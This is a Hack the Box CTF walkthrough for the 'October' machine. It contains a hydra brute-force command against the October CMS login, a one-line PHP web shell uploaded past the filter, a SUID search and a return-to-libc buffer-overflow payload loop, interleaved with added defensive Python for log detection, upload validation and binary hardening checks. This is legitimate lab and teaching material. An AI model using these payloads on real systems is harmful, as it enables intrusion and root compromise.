Hack the Box – October Walkthrough

Today we’re going to solve another CTF machine, “October”. It is now a retired box and is accessible if you’re a VIP member.



  • Target OS: Linux
  • Services: HTTP, SSH
  • IP Address:
  • Difficulty: Medium


  • Default CMS Credentials
  • Binary SUID BOF


  • Getting user
  • Getting root

Table of Contents

  • Ports Scanning
  • Enumerate Directories
  • Brute Force Using Hydra
  • Brute Force Using Burp Suite
  • Reverse Shell
  • Privilege Escalation


As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we identify which services are running behind the target IP address.

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Apache is running and the banner tells us an October CMS instance is installed, so let’s take a look at it.

Enumerate Directories

Dirbuster reveals a directory, /backend, where we can log in as administrator.

Now that we have found the admin login page, we can try a brute-force attack, SQL injection, etc.

But before anything else, let’s search for known exploits first. For that we use searchsploit.

searchsploit -x php/webapps/41936.txt
Exploit: October CMS 1.0.412 - Multiple Vulnerabilities
    URL: https://www.exploit-db.com/exploits/41936/
   Path: /usr/share/exploitdb/platforms/php/webapps/41936.txt

Brute Force Using Hydra

Let’s brute force our way into October CMS using hydra.

Post Request:

POST /backend/backend/auth/signin HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 139

hydra -l admin -P /usr/share/wordlists/rockyou.txt <target-ip> http-post-form "/backend/backend/auth/signin/:login=^USER^&password=^PASS^:Bad Login" -t 64 -w 30 -o hydra-http-post-attack.txt -I


Hydra never works for me. :confused: I don’t know why. Maybe that’s because of sessions and cookies? If I’m missing something, please let me know in the comments.


Brute Force Using Burp Suite

Using Burp Suite I was able to brute force the login. If you also Google October CMS default credentials, you can easily find them: admin:admin.
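From the defender’s side, the traffic pattern above (many POSTs to /backend/backend/auth/signin from one client in a short time) is easy to spot in Apache access logs. The following is an added example, not part of the original walkthrough: the log lines are constructed, the 10.10.14.x addresses are placeholders, and the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

LOGIN_PATH = "/backend/backend/auth/signin"

# Apache "combined" log format; the constructed sample lines below follow it.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])

def find_bruteforce(lines, threshold=10, window_s=60):
    """Map client IP -> peak number of login POSTs seen inside any window_s-second
    sliding window, for clients that exceeded `threshold` (assumed tuning values)."""
    recent = defaultdict(deque)   # per-IP timestamps still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or path.rstrip("/") != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) > threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

# Constructed sample: one client hammering the login form, one normal admin user.
SAMPLE = [
    f'10.10.14.5 - - [21/Apr/2017:10:00:{i:02d} +0000] "POST {LOGIN_PATH} HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'
    for i in range(15)
] + [
    f'10.10.14.9 - - [21/Apr/2017:10:00:30 +0000] "POST {LOGIN_PATH} HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [21/Apr/2017:10:00:31 +0000] "GET /backend HTTP/1.1" 200 5678 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE))   # {'10.10.14.5': 15}
```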

Reverse Shell

Since we have access to the admin panel, we can look for a way to get a reverse shell. If you navigate to Media > Upload, you can try uploading payloads to get a reverse shell.

If you read the exploit we found with searchsploit, there is a way to upload a PHP shell using the .php5 extension, which bypasses the upload filter.


<pre><?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?></pre>

After uploading we can access our shell here.
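The .php5 bypass works because the upload filter is a denylist of extensions while the server still executes .php5 as PHP. As an added example (not October CMS’s own code), here is that weak check next to an allowlist check that also verifies the file’s magic bytes; the allowed types and magic values are a constructed policy.

```python
import os

# Constructed upload policy for a media section (not October CMS's own code):
# allowed extensions and the magic bytes each one must start with.
ALLOWED = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}
# The kind of denylist the exploit gets around: it only knows the literal ".php".
DENYLIST = {".php"}

def ext_of(filename):
    return os.path.splitext(filename)[1].lower()

def denylist_allows(filename):
    """Weak check: anything that is not exactly '.php' passes, so 'shell.php5'
    is accepted even though the server runs .php5 files as PHP."""
    return ext_of(filename) not in DENYLIST

def validate_upload(filename, data):
    """Hardened check: the extension must be allowlisted AND the content must
    begin with that type's magic bytes, so a script renamed to .png is rejected too."""
    ext = ext_of(filename)
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not in allowlist"
    if not data.startswith(ALLOWED[ext]):   # startswith accepts a tuple of prefixes
        return False, "content does not match declared type"
    return True, "ok"

if __name__ == "__main__":
    samples = [("shell.php5", b"<?php echo 1; ?>"),
               ("logo.png", b"\x89PNG\r\n\x1a\n" + bytes(8))]
    for name, blob in samples:
        print(name, "denylist:", denylist_allows(name), "hardened:", validate_upload(name, blob))
```

Serving the upload directory with PHP execution disabled remains the stronger control; the content check only narrows what the filter lets through.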

Now we can use netcat to spawn a reverse shell. I checked every shell, but I found perl installed on the server.

I used a perl reverse shell and URL-encoded it to make it work.

And got a shell on the terminal.

Privilege Escalation

It’s time to get root.txt. We can use privilege escalation scripts to gather information, or do some research manually first to save time.

I manually searched for SUID files and came across one that caught my eye because it was an uncommon file.

find / -user root -perm -4000 -print 2>/dev/null

How can we be sure a file is uncommon?

I knew it was uncommon, but to be sure, cd to that directory first.

cd /usr/local/bin
ls -lAH
total 8
-rwsr-xr-x 1 root root 7377 Apr 21  2017 ovrflw
file ovrflw
ovrflw: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=004cdf754281f7f7a05452ea6eaf1ee9014f07da, not stripped

Let’s download this file to our local machine and do some experiments with it.

We’re gonna use netcat to transfer the file.

Let’s open this file and take a look at assembly code.

At line +67 of the disassembly we have a strcpy call, which is vulnerable to buffer overflow because strcpy copies without any length check.

We’ll create a cyclic pattern string in order to test the buffer overflow.

In gdb we have to run the program with this input and capture the output.

Now just type r. It will run with the pattern we created and crash with EIP set to 0x41384141.

Now search for that value’s offset in the pattern and we’ll know exactly where the EIP register gets overwritten.

Now we know our offset is 112. Let’s try to exploit it on our local machine first.

Let’s run our gdb again.

Now break the program at main.

ASLR is off for this binary, or we can verify it by running the program twice and checking the address of system each time: if the address differs between runs, ASLR is enabled. Let’s check.

As you can see, after running the program two times the system address is the same, which is how we verify that it has no ASLR. Note that gdb disables address randomization for the program it debugs by default (see show disable-randomization), so identical addresses inside gdb say nothing about the target host; the value of /proc/sys/kernel/randomize_va_space on the target is the authoritative check. Now let’s try to get a shell from it.

First we find the addresses of libc’s system and of the /bin/sh string that belong to the same libc mapping. We need the /bin/sh address because it is what system will be pointed at to get a shell. So try this:

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 + "\x10\x73\x58\xb7" + "ZZZZ" + "\xac\x9b\x6a\xb7"');done
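Whether addresses move between runs is a property of the kernel’s ASLR setting, while the binary’s own hardening (PIE, NX) is recorded in its ELF headers; the file output above calls ovrflw a plain “executable” (ET_EXEC, no PIE), so its own code sits at a fixed address even when libc’s does not. The following added example (not part of this write-up) reads those two flags checksec-style from a minimal ELF32 image that is constructed in-line; the NX value used for the sample is an assumption, not ovrflw’s real setting.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header recording the stack's intended permissions
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3

def build_elf32(e_type, stack_flags):
    """Constructed minimal ELF32 image: 52-byte header plus one PT_GNU_STACK entry.
    Real binaries carry many more headers; checksec() only needs these fields."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS32, LSB, EV_CURRENT
    ehdr = e_ident + struct.pack(
        "<HHIIIIIHHHHHH",
        e_type, 3, 1, 0x08048000,      # e_type, EM_386, e_version, e_entry
        52, 0, 0,                      # e_phoff (phdrs follow the header), e_shoff, e_flags
        52, 32, 1, 0, 0, 0)            # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr

def checksec(data):
    """Report PIE and NX for a little-endian ELF32 image: the two binary-side
    properties that matter for a fixed-address return-to-libc like the one above."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("not a little-endian ELF32 image")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    nx = False   # no PT_GNU_STACK at all: legacy x86 loaders grant an executable stack
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", data, off)
        if p_type == PT_GNU_STACK:
            (p_flags,) = struct.unpack_from("<I", data, off + 24)
            nx = not (p_flags & PF_X)
    return {"pie": e_type == ET_DYN, "nx": nx}

def hardening_summary(data):
    """Human-readable verdict in the style of checksec."""
    s = checksec(data)
    pie = "yes" if s["pie"] else "no (fixed load address)"
    return f"PIE: {pie}, NX: {'yes' if s['nx'] else 'no'}"

if __name__ == "__main__":
    # Constructed sample in the shape of ovrflw: ET_EXEC (no PIE); NX stack assumed (PF_R|PF_W).
    print(hardening_summary(build_elf32(ET_EXEC, 0x6)))   # PIE: no (fixed load address), NX: yes
```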